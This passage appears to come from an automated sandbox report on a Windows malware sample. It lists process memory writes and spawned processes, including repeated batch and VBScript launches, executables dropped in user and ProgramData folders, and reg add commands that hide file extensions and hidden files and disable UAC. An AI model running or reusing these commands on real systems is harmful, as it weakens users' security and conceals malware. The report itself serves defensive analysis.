PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1404 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe

"C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe"

C:\ProgramData\WCwgcgww\QuYEoUUs.exe

"C:\ProgramData\WCwgcgww\QuYEoUUs.exe"

C:\ProgramData\uQMsEIoc\AMAkoQUc.exe

C:\ProgramData\uQMsEIoc\AMAkoQUc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZckUMcco.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\liwwEsAI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZWgsYUss.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TUUEAIAU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\IWkYMYcQ\bAIksggA.exe

"C:\Users\Admin\IWkYMYcQ\bAIksggA.exe"

C:\ProgramData\resAEcUc\eWMwoIIE.exe

"C:\ProgramData\resAEcUc\eWMwoIIE.exe"

C:\ProgramData\smcogUYY\UqkoUUYs.exe

C:\ProgramData\smcogUYY\UqkoUUYs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4956 -ip 4956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3372 -ip 3372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4028 -ip 4028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eiAsscsg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\niYwoMEM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hqsoYoow.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZMgAIcgI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IegwoAsY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mcsAAgos.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

